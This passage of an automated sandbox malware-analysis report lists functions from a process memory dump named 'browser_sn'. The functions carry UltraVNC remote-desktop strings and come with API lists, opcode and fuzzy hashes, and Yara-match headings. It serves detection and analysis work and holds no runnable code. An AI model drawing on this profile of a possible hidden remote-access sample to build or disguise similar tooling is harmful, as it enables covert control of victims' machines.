                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Item$MessageSend$_snprintf$InfoScrollText
                                                                            • String ID: <%s>: $MS Sans Serif
                                                                            • API String ID: 1140286628-959951747
                                                                            • Opcode ID: c7a658c0cd68b9c919c6da95f173c1f64cd529a423dcd2b2ccdca4d864df1cc5
                                                                            • Instruction ID: 37380139705b4b08e2508e7d3673ba534a3d4d4c4ec7ce4bd68c0551a0a32fb7
                                                                            • Opcode Fuzzy Hash: c7a658c0cd68b9c919c6da95f173c1f64cd529a423dcd2b2ccdca4d864df1cc5
                                                                            • Instruction Fuzzy Hash: 60917B62A08A5286E750CF65E8406A937B1FB98B8DF004235DF8D97B68CFBCD595C340
                                                                            Function 00007FF6C2BA00F0 Relevance: 28.1, APIs: 12, Strings: 4, Instructions: 123COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: freeinet_ntoa$_errnogetpeernamegetsockname$ErrorFreeHeapLast_invalid_parameter_noinfomalloc
                                                                            • String ID: <unavailable>$Local loop-back connections are disabled.$vncclient.cpp : loopback connection attempted - client accepted$vncclient.cpp : loopback connection attempted - client rejected
                                                                            • API String ID: 3199031719-36275550
                                                                            • Opcode ID: c44d7390c6da1f5effd3baa685ac2797441d9ecea07109d0da10d2a128be3049
                                                                            • Instruction ID: 46c33732a7e9ddfe81e61c45bdc676dfd2b02de0e599521501dab0277be8283b
                                                                            • Opcode Fuzzy Hash: c44d7390c6da1f5effd3baa685ac2797441d9ecea07109d0da10d2a128be3049
                                                                            • Instruction Fuzzy Hash: 39511721A09B4286EB94DF21A8542B973A0FF88B8EF444535EE8E87765DFBCE545C700
                                                                            Function 00007FF6C2C423D8 Relevance: 27.2, APIs: 18, Instructions: 236COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: __doserrno_errno$_invalid_parameter_noinfo
                                                                            • String ID:
                                                                            • API String ID: 2315031519-0
                                                                            • Opcode ID: 2cd480b998b965cc6955ada75f3ee5f47b1b2dcf7e54efe20603cb8eba4e3483
                                                                            • Instruction ID: 255a8f8942048ce45477fb6476327c372e09ddeaba20896d4ecf2eedb2c74c25
                                                                            • Opcode Fuzzy Hash: 2cd480b998b965cc6955ada75f3ee5f47b1b2dcf7e54efe20603cb8eba4e3483
                                                                            • Instruction Fuzzy Hash: C0B14832A0865286E7A49F25E45217EB7B0FB84B5AF504135EBCD83B94DFBCE460CB11
                                                                            Function 00007FF6C2BB3260 Relevance: 26.3, APIs: 8, Strings: 7, Instructions: 89threadsynchronizationCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Thread$Object$CloseCreateCurrentDesktopEventHandleInformationResetSingleTerminateUserWait
                                                                            • String ID: Default$vncdesktopsink.cpp : ERROR: initwindowthread failed to start $vncdesktopsink.cpp : StartInitWindowthread $vncdesktopsink.cpp : StartInitWindowthread default desk$vncdesktopsink.cpp : StartInitWindowthread no default desk$vncdesktopsink.cpp : StartInitWindowthread reactivate$vncdesktopsink.cpp : StartInitWindowthread started
                                                                            • API String ID: 3943905059-2958163836
                                                                            • Opcode ID: e218055b09ea2cf65919ada1ad6196f8f0811d873fe4ec65c432ea6f649def2e
                                                                            • Instruction ID: d1583f12ebc5535dbbe6905f06d0a9bd1de0ddc822962c71d4d3c2ecde5d0203
                                                                            • Opcode Fuzzy Hash: e218055b09ea2cf65919ada1ad6196f8f0811d873fe4ec65c432ea6f649def2e
                                                                            • Instruction Fuzzy Hash: 66413935A08A8286E7509F60E8447FA6365FF8574EF884432CE8D973A9DFBCE149C350
                                                                            Function 00007FF6C2BBBF40 Relevance: 24.7, APIs: 7, Strings: 7, Instructions: 202windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: DeleteIconInfoObject
                                                                            • String ID: vncencoderCursor.cpp : GetBitmapBits() failed.$vncencoderCursor.cpp : GetIconInfo() failed.$vncencoderCursor.cpp : GetObject() for bitmap failed.$vncencoderCursor.cpp : cursor bitmap handle is NULL.$vncencoderCursor.cpp : cursor handle is NULL.$vncencoderCursor.cpp : incorrect data in cursor bitmap.$vncencoderCursor.cpp : vncDesktop::GetRichCursorData() failed.
                                                                            • API String ID: 2689914137-3853778978
                                                                            • Opcode ID: 07e0550d49a1be20bf1bf2cec04459e0c3bbd83d3f4aa2a3eb294f96f2703f77
                                                                            • Instruction ID: e5e4c341ce159823796116a921d798d28aae52b3b49adb590edb42d00a2096ff
                                                                            • Opcode Fuzzy Hash: 07e0550d49a1be20bf1bf2cec04459e0c3bbd83d3f4aa2a3eb294f96f2703f77
                                                                            • Instruction Fuzzy Hash: 7E917E72B086828AEB60DF61A4803B963A4FB45B8EF404435DE8DD7B95DFBCE545C740
                                                                            Function 00007FF6C2BF0160 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 163memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Global$Lock$AllocFreemalloc
                                                                            • String ID: Unable to allocate memory in zip dll
                                                                            • API String ID: 105282483-1808592719
                                                                            • Opcode ID: 439d1d74bec1a377bae1f8d9f7e6becaa1aace2b029c7af40cc9af3f3fa69061
                                                                            • Instruction ID: 6f3615644345af66a0bd1b2bcc3298f3a21228786223cdd0f0b4cb157e68dee1
                                                                            • Opcode Fuzzy Hash: 439d1d74bec1a377bae1f8d9f7e6becaa1aace2b029c7af40cc9af3f3fa69061
                                                                            • Instruction Fuzzy Hash: DF71273AA09B8286EA45CF65E4502B933A4FF59B8EF048536CE8D87365DF7CE4418350
                                                                            Function 00007FF6C2BAF420 Relevance: 24.7, APIs: 8, Strings: 6, Instructions: 157windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Delete$Object$CloseDesktopMessagePostRelease
                                                                            • String ID: vncdesktop.cpp : delete ((RGBPixelList) $vncdesktop.cpp : failed to DeleteDC hmemdc$vncdesktop.cpp : failed to DeleteDC hrootdc$vncdesktop.cpp : failed to DeleteObject$vncdesktop.cpp : failed to close desktop$vncdesktopsink.cpp : ShutdownInitWindowthread
                                                                            • API String ID: 4267955742-668190334
                                                                            • Opcode ID: 1ff92f652932cc3e318c67025513c794b83a66298c3f6cc6a979c7f0a12e43a6
                                                                            • Instruction ID: 9e93b8aa46f49d3004cbf240ee342817dcb724c7ae26cddaba3db7b30af05f93
                                                                            • Opcode Fuzzy Hash: 1ff92f652932cc3e318c67025513c794b83a66298c3f6cc6a979c7f0a12e43a6
                                                                            • Instruction Fuzzy Hash: F4715536A08AC285EB649FA5E8402EA3364FF45B8EF444436CE8D87B59CFBDE155D310
                                                                            Function 00007FF6C2B98390 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 135filetimeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: File$CreateTime$CloseHandleSize$CompareMappingView
                                                                            • String ID: c:\video0.dat$c:\video1.dat$videodriver.cpp : Error video.dat
                                                                            • API String ID: 286203867-3102623397
                                                                            • Opcode ID: ce2218cedf4f6f46ef2e14e32633e79e1cfc0ccdd4c7bc6ede49bc933eaae26a
                                                                            • Instruction ID: 76b1a59558cd5354a0aba5f4990c88c403c0352b08f6477eb5e758637de587cf
                                                                            • Opcode Fuzzy Hash: ce2218cedf4f6f46ef2e14e32633e79e1cfc0ccdd4c7bc6ede49bc933eaae26a
                                                                            • Instruction Fuzzy Hash: 1F51E431A0864285EB609F15A50067973B1AF96BBEF480331CEBC837E0DEBCE459C300
                                                                            Function 00007FF6C2B83C70 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 112windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Object$Select$CreateDelete$BrushClipCompatibleEmptyFileModuleNameRectSolidStretch
                                                                            • String ID: $!
                                                                            • API String ID: 844750580-2056089098
                                                                            • Opcode ID: 1a38819b2fb7280654c83d9d129417f0ee9e3dd9bf97b6a7fb9e9e76a124db12
                                                                            • Instruction ID: b72a663789cbc17a9f4bdc10ec6be0ecf4bdf640eb5336181322c461780df6e6
                                                                            • Opcode Fuzzy Hash: 1a38819b2fb7280654c83d9d129417f0ee9e3dd9bf97b6a7fb9e9e76a124db12
                                                                            • Instruction Fuzzy Hash: 4541433560C78286EBA0DF11A85436A77A0FF89B9AF044135DE9E87B94DF7CE444DB00
                                                                            Function 00007FF6C2B92880 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 85libraryregistryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Service$Status$Library$AddressCloseCreateCtrlEventFreeHandleHandlerLoadMetricsProcRegisterSystem
                                                                            • String ID: RegisterServiceCtrlHandlerExA$advapi32.dll$uvnc_service
                                                                            • API String ID: 333848887-3586523739
                                                                            • Opcode ID: c7b1663068b9192da73d5e996cff8b829b46b9983eaef1313fb1f4a7c7fe863a
                                                                            • Instruction ID: ba9ca640f3d9436bf1c9530caeeaa7dd71db16d154abf3efbf397b309182c087
                                                                            • Opcode Fuzzy Hash: c7b1663068b9192da73d5e996cff8b829b46b9983eaef1313fb1f4a7c7fe863a
                                                                            • Instruction Fuzzy Hash: 02411724919B8281F750AF21E85427532B0BF997AEF444135CEDEC6BA0DFBCE065CB44
                                                                            Function 00007FF6C2BB09F0 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 82COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            • UltraVVNC running as application doesn't have permission to acces UAC protected windows.Screen is locked until the remote user unlock this window, xrefs: 00007FF6C2BB0AAC
                                                                            • x, xrefs: 00007FF6C2BB0A25
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Color$ObjectText$RectSelect$BitsBrushCreateDeleteDrawFillFlushSolid
                                                                            • String ID: UltraVVNC running as application doesn't have permission to acces UAC protected windows.Screen is locked until the remote user unlock this window$x
                                                                            • API String ID: 3190128964-2508378015
                                                                            • Opcode ID: 422fa4f30dff9bfc24b23924f9a70426f5dd9492b070c67ff410ac0bceba6c3d
                                                                            • Instruction ID: 18c5701869b1bb5cd949c179ff06b73f05e39b1ba915b914fa1d47c2272bfa9b
                                                                            • Opcode Fuzzy Hash: 422fa4f30dff9bfc24b23924f9a70426f5dd9492b070c67ff410ac0bceba6c3d
                                                                            • Instruction Fuzzy Hash: 73310C36608A8696E750DF69E8445AA7371FB89B9EF044032EF8E87718DFBCD445CB10
                                                                            Function 00007FF6C2B99C30 Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 300COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CombineCreateDeleteObjectRectfree$ErrorFreeHeapLast_errnomalloc
                                                                            • String ID: vistahook.cpp : REct %i %i %i %i
                                                                            • API String ID: 1305454473-3781348997
                                                                            • Opcode ID: d0ac63cbbbf134ee707a0d0b838e12a005fdeef02525ce0b9f81c8b524f91dbc
                                                                            • Instruction ID: dbb38ae4d9b27e0203aa2a95a07324275bbd8ad4bea865372872e3f0dd484c43
                                                                            • Opcode Fuzzy Hash: d0ac63cbbbf134ee707a0d0b838e12a005fdeef02525ce0b9f81c8b524f91dbc
                                                                            • Instruction Fuzzy Hash: EFE15476B08A918EE750CF69D4846AC77F1FB49B88F404026DE8E93B18DFB9E454CB40
                                                                            Function 00007FF6C2B8B030 Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 135COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
